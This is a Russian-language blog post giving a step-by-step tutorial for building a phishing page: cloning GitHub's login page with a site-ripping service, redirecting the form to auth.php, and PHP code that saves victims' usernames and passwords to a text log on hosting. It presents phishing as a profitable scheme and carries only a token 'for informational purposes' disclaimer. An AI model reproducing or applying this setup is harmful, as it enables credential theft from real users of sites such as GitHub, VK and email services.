11 подписчиков

Как создать фишинг страницу за пару минут?

29 марта 202029 мар 2020

480

1 мин

Всем привет, мои друзья! В этой статье я хочу вам рассказать о том, как можно создай фишинг из любого сайта. Кто не знает, фишинг это клон какой-то страницы с авторизацией, например гитхаб, вк или почты. Погнали!

Я никого ни к чему не призываю, статья написана в ознакомительных целях!

Теория об фишинге

Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инженерия.

Приступим к первому этапу

Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github .com/login

Для РИПа (клонирования) будем использовать сервис - WebParse

Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:

После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:

Второй этап

Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параметр action, нам нужно его изменить:

Меняем его на auth.php

На скрине параметр уже изменён.

Теперь в папке с html файлом создаём auth.php и папку base:

Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:

<?php
file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND);
?>

file_put_contents функция для записи данных в файл, base/ds_logs.txt - путь к файлу, где сохранятся пароли, FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

Теперь загружаем всё это дело на хостинг, а папке base даём права 777